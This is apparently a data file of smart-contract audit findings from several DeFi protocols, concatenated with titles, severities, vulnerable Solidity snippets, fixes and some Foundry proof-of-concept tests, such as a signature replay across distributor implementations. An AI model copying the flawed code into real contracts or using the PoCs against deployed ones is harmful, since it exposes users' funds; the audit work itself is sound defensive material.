The `ERC721::Transfer` is an important event. The incorrect event logs may cause off-chain services to malfunction.
```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n
The same signature can be used in different `distribution` implementation causing that the caller who owns the signature, can distribute on unauthorized implementations
high
The same signature can be used in different `distribute` implementations causing that the caller who owns the signature, to `distribute` on unauthorized implementations.\\nThe ProxyFactory::setContest() function helps to configure a `closeTime` to specific `organizer`, `contestId` and `implementation`.\\n```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n\\nThe caller who owns the signature, can distributes to winners using the deployProxyAndDistributeBySignature() function. The problem is that the hash in the code line (#159) does not consider the `implementation` parameter.\\n```\\nFile: ProxyFactory.sol\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n if (ECDSA.recover(digest, signature) != organizer) revert ProxyFactory__InvalidSignature();\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] == 0) revert ProxyFactory__ContestIsNotRegistered();\\n if (saltToCloseTime[salt] > block.timestamp) revert ProxyFactory__ContestIsNotClosed();\\n address proxy = _deployProxy(organizer, contestId, implementation);\\n _distribute(proxy, data);\\n return proxy;\\n }\\n```\\n\\nFor some reason, there could be a different `distribution` implementation to the same `contestId`. Then the caller who owns the signature can distribute even if the organizer does not authorize a signature to the new implementation.\\nI created a test where the caller who owns a signature can distribute to new `distribute implementation` using the same signature. Test steps:\\nOwner setContest using the implementation `address(distributor)`\\nOrganizer creates a signature.\\nCaller distributes prizes using the signature.\\nFor some reason there is a new distributor implementation. The Owner set the new distributor for the same `contestId`.\\nThe caller can distribute prizes using the same signature created in the step 2 in different distributor implementation.\\n```\\n// test/integration/ProxyFactoryTest.t.sol:ProxyFactoryTest\\n// $ forge test --match-test "testSignatureCanBeUsedToNewImplementation" -vvv\\n//\\n function testSignatureCanBeUsedToNewImplementation() public {\\n address organizer = TEST_SIGNER;\\n bytes32 contestId = keccak256(abi.encode("Jason", "001"));\\n //\\n // 1. Owner setContest using address(distributor)\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(distributor));\\n vm.stopPrank();\\n bytes32 salt = keccak256(abi.encode(organizer, contestId, address(distributor)));\\n address proxyAddress = proxyFactory.getProxyAddress(salt, address(distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyAddress, 10000 ether);\\n vm.stopPrank();\\n assertEq(MockERC20(jpycv2Address).balanceOf(proxyAddress), 10000 ether);\\n // before\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 0 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 0 ether);\\n //\\n // 2. Organizer creates a signature\\n (bytes32 digest, bytes memory sendingData, bytes memory signature) = createSignatureByASigner(TEST_SIGNER_KEY);\\n assertEq(ECDSA.recover(digest, signature), TEST_SIGNER);\\n vm.warp(8.01 days);\\n //\\n // 3. Caller distributes prizes using the signature\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(distributor), signature, sendingData\\n );\\n // after\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 9500 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 500 ether);\\n //\\n // 4. For some reason there is a new distributor implementation.\\n // The Owner set the new distributor for the same contestId\\n Distributor new_distributor = new Distributor(address(proxyFactory), stadiumAddress);\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(new_distributor));\\n vm.stopPrank();\\n bytes32 newDistributorSalt = keccak256(abi.encode(organizer, contestId, address(new_distributor)));\\n address proxyNewDistributorAddress = proxyFactory.getProxyAddress(newDistributorSalt, address(new_distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyNewDistributorAddress, 10000 ether);\\n vm.stopPrank();\\n //\\n // 5. The caller can distribute prizes using the same signature in different distributor implementation\\n vm.warp(20 days);\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(new_distributor), signature, sendingData\\n );\\n }\\n```\\n
Include the `distribution implementation` in the signature hash.\\n```\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n// Remove the line below\\n// Remove the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n// Add the line below\\n// Add the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, implementation, data)));\\n```\\n
The caller who owns the signature, can distribute the prizes for a new distribution implementation using the same signature which was created for an old implementation. The `organizer` must create a new signature if there is a new implementation for the same `contestId`. The authorized signature is for one distribution implementation not for the future distribution implementations.\\nTools used\\nManual review
```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n
Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever
medium
The vulnerability relates to the immutability of `STADIUM_ADDRESS`. If this address is blacklisted by the token used for rewards, the system becomes unable to make transfers, leading to funds being stuck in the contract indefinitely.\\nOwner calls `setContest` with the correct `salt`.\\nThe Organizer sends USDC as rewards to a pre-determined Proxy address.\\n`STADIUM_ADDRESS` is blacklisted by the USDC operator.\\nWhen the contest is closed, the Organizer calls `deployProxyAndDistribute` with the registered `contestId` and `implementation` to deploy a proxy and distribute rewards. However, the call to `Distributor._commissionTransfer` reverts at Line 164 due to the blacklisting.\\nUSDC held at the Proxy contract becomes stuck forever.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n
It is recommended to allow `STADIUM_ADDRESS` to be updatable by a dedicated admin role to avoid token transfer blacklisting. Moreover, since `STADIUM_ADDRESS` is no longer `immutable`, `storage` collision should be taken into account.
This vulnerability is marked as High severity because a blacklisted `STADIUM_ADDRESS` would lead to funds being locked in the Proxy address permanently. Funds are already held in the Proxy, and the Proxy's `_implementation` cannot be changed once deployed. Even the `ProxyFactory.distributeByOwner()` function cannot rescue the funds due to the revert.
```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n
`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow
low
`InvestorBasedRateLimiter::_checkAndUpdateRateLimitState` L211-213 subtracts the current mint/redemption amount from the corresponding limit:\\n```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n\\nIf `setInvestorMintLimit` or `setInvestorRedemptionLimit` are used to set the limit amount for minting or redemptions smaller than the current mint/redemption amount, calls to this function will revert due to underflow.
Explicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nif (rateLimit.limit <= rateLimit.currentAmount || amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n
`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow.\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_setInvestorMintLimit_underflow_DoS() public initDefault(alice) {\\n // first perform a mint\\n uint256 mintAmount = rateLimiter.defaultMintLimit();\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, mintAmount);\\n\\n // admin now reduces the mint limit to be under the current\\n // minted amount\\n uint256 aliceInvestorId = 1;\\n uint256 newMintLimit = mintAmount - 1;\\n vm.prank(guardian);\\n rateLimiter.setInvestorMintLimit(aliceInvestorId, newMintLimit);\\n\\n // subsequent calls to `checkAndUpdateMintLimit` revert due to underflow\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, 1);\\n\\n // same issue affects `setInvestorRedemptionLimit`\\n}\\n```\\n\\nRun with: `forge test --match-test test_setInvestorMintLimit_underflow_DoS`\\nProduces output:\\n```\\nRan 1 test for forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:Test_InvestorBasedRateLimiter_setters_ETH\\n[FAIL. Reason: panic: arithmetic underflow or overflow (0x11)] test_setInvestorMintLimit_underflow_DoS() (gas: 264384)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 1.09ms (116.74µs CPU time)\\n```\\n
```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n
Prevent creating an investor record associated with no address
low
`InvestorBasedRateLimiter::initializeInvestorStateDefault` is supposed to associate a newly created investor with one or more addresses but the `for` loop which does this can be bypassed by calling the function with an empty array:\\n```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can by bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n
In `_initializeInvestorState` revert if the input address array is empty:\\n```\\nuint256 addressesLength = addresses.length;\\n\\nif(addressesLength == 0) revert EmptyAddressArray();\\n```\\n
An investor record can be created without any associated address. This breaks the following invariant of the `InvestorBasedRateLimiter` contract:\\nwhen a new `investorId` is created, it should be associated with one or more valid addresses\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_initializeInvestor_NoAddress() public {\\n // no investor created\\n assertEq(0, rateLimiter.investorIdCounter());\\n\\n // empty input array will bypass the `for` loop that is supposed\\n // to associate addresses to the newly created investor\\n address[] memory addresses;\\n\\n vm.prank(guardian);\\n rateLimiter.initializeInvestorStateDefault(addresses);\\n\\n // one investor created\\n assertEq(1, rateLimiter.investorIdCounter());\\n\\n // not associated with any addresses\\n assertEq(0, rateLimiter.investorAddressCount(1));\\n}\\n```\\n\\nRun with: `forge test --match-test test_initializeInvestor_NoAddress`
```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can by bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n
`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow
low
`InstantMintTimeBasedRateLimiter::_checkAndUpdateInstantMintLimit` L103-106 subtracts the currently minted amount from the mint limit:\\n```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n "RateLimit: Mint exceeds rate limit"\\n);\\n```\\n\\nIf `_setInstantMintLimit` is used to set `instantMintLimit < currentInstantMintAmount`, subsequent calls to this function will revert due the underflow. The same is true for `_setInstantRedemptionLimit` and `_checkAndUpdateInstantRedemptionLimit`.
Explicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nfunction _checkAndUpdateInstantMintLimit(uint256 amount) internal {\\n require(\\n instantMintLimit > currentInstantMintAmount && amount <= instantMintLimit - currentInstantMintAmount,\\n "RateLimit: Mint exceeds rate limit"\\n );\\n}\\n\\nfunction _checkAndUpdateInstantRedemptionLimit(uint256 amount) internal {\\n require(\\n instantRedemptionLimit > currentInstantRedemptionAmount && amount <= instantRedemptionLimit - currentInstantRedemptionAmount,\\n "RateLimit: Redemption exceeds rate limit"\\n );\\n}\\n```\\n
`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow.
```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n "RateLimit: Mint exceeds rate limit"\\n);\\n```\\n
Protocol may be short-changed by `BuidlRedeemer` during a USDC depeg event
low
`OUSGInstantManager::_redeemBUIDL` assumes that 1 BUIDL = 1 USDC as it enforces receiving 1 USDC for every 1 BUIDL it redeems:\\n```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n "OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1"\\n);\\n```\\n\\nIn the event of a USDC depeg (especially if the depeg is sustained), `BUIDLRedeemer` should return greater than a 1:1 ratio since 1 USDC would not be worth $1, hence 1 BUIDL != 1 USDC meaning the value of the protocol's BUIDL is worth more USDC. However `BUIDLReceiver` does not do this, it only ever returns 1:1.
To prevent this situation the protocol would need to use an oracle to check whether USDC had depegged and if so, calculate the amount of USDC it should receive in exchange for its BUIDL. If it is short-changed it would either have to revert preventing redemptions or allow the redemption while saving the short-changed amount to storage then implement an off-chain process with BlackRock to receive the short-changed amount.\\nAlternatively the protocol may simply accept this as a risk to the protocol that it will be willingly short-changed during a USDC depeg in order to allow redemptions to continue.
In the event of a USDC depeg the protocol will be short-changed by `BuidlRedeemer` since it will happily receive only 1 USDC for every 1 BUIDL redeemed, even though the value of 1 BUIDL would be greater than the value of 1 USDC due to the USDC depeg.
```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n "OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1"\\n);\\n```\\n
Consider allowing `ROUSG::burn` to burn dust amounts
low
`ROUSG::burn` is used by admins to burn `rOUSG` tokens from any account for regulatory reasons.\\nIt does not allow burning a share amount smaller than 1e4, because this is less than a wei of `OUSG`.\\n```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n\\nDepending on the current and future regulatory situation it could be necessary to always be able to burn all shares from users.
Consider allowing the `burn` function to `burn` all remaining shares even if under the minimum amount.
null
```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n
`Goldilend.lock()` will always revert
high
In `lock()`, it calls `_refreshiBGT()` before pulling `iBGT` from the user and will revert while calling `iBGTVault(ibgtVault).stake()`.\\n```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n
`_refreshiBGT()` should be called after pulling funds from the user.
Users can't lock `iBGT` as `lock()` always reverts.
```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n
Wrong `PoolSize` increment in `Goldilend.repay()`
high
When a user repays his loan using `repay()`, it increases `poolSize` with the repaid interest. During the increment, it uses the wrong amount.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n\\nIt should use `interest` instead of `userLoan.interest` because the user repaid `interest` only.
`poolSize` should be updated using `interest`.
`poolSize` would be tracked wrongly after calling `repay()` and several functions wouldn't work as expected.
```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n
Users can extend an expired boost using invalidated NFTs.
high
In `Goldilend.sol#L251`, a user can extend a boost with invalidated NFTs.\\nThe user has created a boost with a valid NFT.\\nAfter that, the NFT was invalidated using `adjustBoosts()`.\\nAfter the original boost is expired, the user can just call `boost()` with empty arrays, and the boost will be extended again with the original magnitude.\\n```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n
Whenever users extend their boosts, their NFTs should be evaluated again.
Malicious users can use invalidated NFTs to extend their boosts forever.
```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n
Team members can't unstake the initial allocation forever.
high
When users call `unstake()`, it calculates the vested amount using `_vestingCheck()`.\\n```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n\\nBut it returns 0 for team members and they can't unstake forever. Furthermore, in `stake()`, it just prevents seed investors, not team members. So if team members have staked additionally, they can't unstake also.
`_vestingCheck` should use the same logic as initial investors for team mates.
Team members can't unstake forever.
```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n
In `GovLocks`, it shouldn't use a `deposits` mapping
high
In `GovLocks`, it tracks every user's deposit amount using a `deposits` mapping. As users can transfer `govLocks` freely, they might have fewer `deposits` than their `govLocks` balance and wouldn't be able to withdraw when they want.\\n```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n\\nHere is a possible scenario.\\nAlice has deposited 100 `LOCKS` and got 100 `govLOCKS`. Also `deposits[Alice] = 100`.\\nBob bought 50 `govLOCKS` from Alice to get voting power.\\nWhen Bob tries to call `withdraw()`, it will revert because `deposits[Bob] = 0` although he has 50 `govLOCKS`.
We don't need to use the `deposits` mapping at all and we can just rely on `govLocks` balances.
Users wouldn't be able to withdraw `LOCKS` with `govLOCKS`.
```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n
Some functions of `Goldilend` will revert forever.
high
`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever because they doesn't withdraw `ibgt` from `ibgtVault` before the transfer.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n\\nAs `ibgtVault` has all `ibgt` of `Goldilend`, they should withdraw from `ibgtVault` first.
3 functions should be changed like the below.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n+ iBGTVault(ibgtVault).withdraw(poolSize - outstandingDebt);\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n
`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever.
```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n